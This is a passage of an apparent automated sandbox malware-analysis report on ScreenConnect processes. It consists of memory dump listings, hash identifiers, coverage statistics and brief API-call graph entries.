                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3501A771404340EEEB684E66E884767BBD8EF412A4F18C519ED594F283C7799442CBB6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3156448652.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_115d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 7b9c83751b0482bbd0c5915c79fba3e543f1346f6c626969e2960c5ca9cc2110
                                                                                                                                                                                                                                                                    • Instruction ID: 17148b4cec24137a4e832276f10f98eb752c99727768625833d00b523031a4cb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b9c83751b0482bbd0c5915c79fba3e543f1346f6c626969e2960c5ca9cc2110
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2501527140D3C09FD7164B259C94752BFB4EF42224F1981DBED988F293C2695844C772
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 99cef4a65ddfe619e104bd79c3111c69289a8cc883b6369884e20dd9ee9243ef
                                                                                                                                                                                                                                                                    • Instruction ID: f511031ba58aecd0e4534c91cd5ee2984573b13a70b724851e715eb47d454abb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99cef4a65ddfe619e104bd79c3111c69289a8cc883b6369884e20dd9ee9243ef
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37017170E151098FEB54DF68C599AEE7BF2FF44300F1094A9C4099B351E770D946CB82
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 9b0b849e8a931937e9c6a13a15ad43938009e42fd5e7ec2dd4909684fce41a6d
                                                                                                                                                                                                                                                                    • Instruction ID: e54485a0350d953316f426909eaad00c786e2a50ad27c6da4217a9c5ca5e7d44
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b0b849e8a931937e9c6a13a15ad43938009e42fd5e7ec2dd4909684fce41a6d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE012C30E002098FEB44DF68C559AAE7BF6FF48304F5094A9D409DB351EA70D941CB82
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: d24212236a32263056c0e076d9cfecfd6372b090aea237dce72b3cd19b603678
                                                                                                                                                                                                                                                                    • Instruction ID: 5d939759d93ad1ae1224e4b76daa8ebbbc38cdc02390331fc793894f024108e5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d24212236a32263056c0e076d9cfecfd6372b090aea237dce72b3cd19b603678
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8E02B31204310EFE7148A19E8C089BBBF8EBC15243904179E548C7601D624FC03C7A0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:13.6%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                    Signature Coverage:37.5%
                                                                                                                                                                                                                                                                    Total number of Nodes:8
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                                                                                                                                    execution_graph 12628 7ffaac463642 12629 7ffaac485c40 CreateNamedPipeW 12628->12629 12631 7ffaac485d73 12629->12631 12623 7ffaac468014 12624 7ffaac46801d 12623->12624 12625 7ffaac468082 12624->12625 12626 7ffaac4680f6 SetProcessMitigationPolicy 12624->12626 12627 7ffaac468152 12626->12627

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: 6
                                                                                                                                                                                                                                                                    • API String ID: 0-1452363761
                                                                                                                                                                                                                                                                    • Opcode ID: 4a1e186b8524eb79f8cb42b5df9275cb3f5c3b9a74f69130c480c4e10452d118
                                                                                                                                                                                                                                                                    • Instruction ID: 44c75202403859720fd1a605a7e2b587c81ebc94dc98218f690a330e0559723e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a1e186b8524eb79f8cb42b5df9275cb3f5c3b9a74f69130c480c4e10452d118
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2125971A1EB5E8FF799D72C8455AB53BE1EF5A300F1480B9E44EC7193DD28E84A8381

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: 6
                                                                                                                                                                                                                                                                    • API String ID: 0-1452363761
                                                                                                                                                                                                                                                                    • Opcode ID: 5cf09f2a636cdb8f726c7e9e0d850485863ee8462794293b6a11475b2b0ebfd1
                                                                                                                                                                                                                                                                    • Instruction ID: 20b29353b053db9af9e7d609693b3a947fc3348b1a1feede52c9c6bec6147ebf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cf09f2a636cdb8f726c7e9e0d850485863ee8462794293b6a11475b2b0ebfd1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27E1222191DA6FCBFEE9972884556B437E1EF52300F5881B9D84EC75C7DE28E80A87C1

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 810 7ffaac463642-7ffaac485caa 813 7ffaac485cac-7ffaac485cb1 810->813 814 7ffaac485cb4-7ffaac485d71 CreateNamedPipeW 810->814 813->814 816 7ffaac485d79-7ffaac485dac 814->816 817 7ffaac485d73 814->817 817->816
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3164918389.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac460000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateNamedPipe
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2489174969-0
                                                                                                                                                                                                                                                                    • Opcode ID: 65293140e445c8b372aecb85c762e861d089ee192d0151127c0f893103def85b
                                                                                                                                                                                                                                                                    • Instruction ID: a97e456446fc36d3aabe61b33f646c1adada5ec8dc19184906ce818a355d7432
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65293140e445c8b372aecb85c762e861d089ee192d0151127c0f893103def85b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C51917191CA1C8FDB68EF58D845BE9B7E0FB59710F1082AEE04ED3241CB70A9858BC1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 74962dc666a662d3f6f75168a5b3d6b12a39da154d09319da5fbda8f9162da2a
                                                                                                                                                                                                                                                                    • Instruction ID: 59dd8f122e75c61563a13c905877e7d32fa183e1f059c5ae207db5418a507f57
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74962dc666a662d3f6f75168a5b3d6b12a39da154d09319da5fbda8f9162da2a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24120635E1AA6ECFFB95D7288455AB973E1EF86304F548079D44EC31D6DE28E80983C1

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: /$/
                                                                                                                                                                                                                                                                    • API String ID: 0-972056843
                                                                                                                                                                                                                                                                    • Opcode ID: 2ec2c9cad42bdca017f1d83914bb4c7c4b8888e28a792e16d6849ffdc588ff7f
                                                                                                                                                                                                                                                                    • Instruction ID: 256b52f766edc011344f04489a942694da67a471bef47e2694e9485d8403a308
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ec2c9cad42bdca017f1d83914bb4c7c4b8888e28a792e16d6849ffdc588ff7f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4731F511E0EA6E8BF7A4A7689895274A6E1FF56300F4485BAD41DC32C3ED58EC5887C1

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3164918389.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac460000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1088084561-0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: 6
• API String ID: 0-1452363761
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 5037346b64a3d35dd09078dad6431b4e9e7fa43293a5b2ec18e2a062b7d34eb6
                                                                                                                                                                                                                                                                    • Instruction ID: bc25ec6bc91aac8629357fc1189c7c4090fe30a21097c41b45ba9514377657bd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5037346b64a3d35dd09078dad6431b4e9e7fa43293a5b2ec18e2a062b7d34eb6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7911E511A0E9794FEB95A37C68599B56BE0DF57310B0840F6E40DCB197DD09E84987C0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: a8e2cf001ee7376d7fc23cb29f1a13b8eb2a3630eddf9bc98be1e95603850f50
                                                                                                                                                                                                                                                                    • Instruction ID: a70ff830bc338683c745254cad155e0bb906b5a9a21e5ce26f29f69f651539e3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8e2cf001ee7376d7fc23cb29f1a13b8eb2a3630eddf9bc98be1e95603850f50
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2211C43550DA9C8FDB55EB6CD451DE17FB0FF5632070446EAD04DCB062EA24D948C782
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 524d1fbebf94862aa172b8ea22e616f197d21350b56e85a36ba3ccdce803ec5e
                                                                                                                                                                                                                                                                    • Instruction ID: aeb5ceabe2b1790e039e47efec1af2d62fe6bfe04edb034cfc7e993e1eb85116
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 524d1fbebf94862aa172b8ea22e616f197d21350b56e85a36ba3ccdce803ec5e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 681186A0A19A59CFEB84EF28C445B6577E1FF55300F1481B8C45ECB687DE25EC498BC0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 07d947c82f40644c760144add03ba881c8b8cdfc238ce8c71e28b647cb11f3cb
                                                                                                                                                                                                                                                                    • Instruction ID: c57a23e215dd7140859d4983cec0bcd4042598452123fc27a76b20b59a6d93ed
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07d947c82f40644c760144add03ba881c8b8cdfc238ce8c71e28b647cb11f3cb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C41182A0A19A59CFEB88EF28C445B6577E1FF59300B0481A8C45ECB687DE25EC098BC0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 8cdf1cfd923d87ab9250d245dbf967b3a2aafe0836efe654578d5047988511f7
                                                                                                                                                                                                                                                                    • Instruction ID: 8118479b838c99f997c45c3afcaa52737cdd94059afe52718b4807e7a2439260
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cdf1cfd923d87ab9250d245dbf967b3a2aafe0836efe654578d5047988511f7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5401D2A250F7D58FE756973C54694B03FA0DF8326471881EFD088CB4A7E504991EC392
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: c8ccdb8a780cbc804ed5e95e10d74da16fba947b2ff49fe27b641e20c2897d26
                                                                                                                                                                                                                                                                    • Instruction ID: 7c47ebaea46744b35672c02c563b3eff0ed6136d729bbc336ad79a4537c5e524
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8ccdb8a780cbc804ed5e95e10d74da16fba947b2ff49fe27b641e20c2897d26
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5012C2560E7889FEFDADB28D8A15E03BA1EF5631432508EED059CF1C7DA16E84BC741
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: ab2807b801254848d4de8088d3746f3532df925736851dea7fea84b98ed2508f
                                                                                                                                                                                                                                                                    • Instruction ID: de28c2c89725cbb427b3ba2b798a708baaa81f2586c468c6300087a25084c08c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab2807b801254848d4de8088d3746f3532df925736851dea7fea84b98ed2508f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0E08622A09D3D8FABA9A75C54549757BE0EB687007194195E40DC71A5DD14DC888BC0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 20e778d099978ea43daf0335942888fa0f01c8aee3a9d66771569d3d01802f56
                                                                                                                                                                                                                                                                    • Instruction ID: d82206147fdca3e9eca7b726ae2b9ed279c87ac0dbf59caf8bfbdbfa16387373
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20e778d099978ea43daf0335942888fa0f01c8aee3a9d66771569d3d01802f56
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10D05B31E09C3D8F6BA9F71C6448D7572D0EB697107054195E41DC72A8DD14DD8587C4
Memory Dump Source
• Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd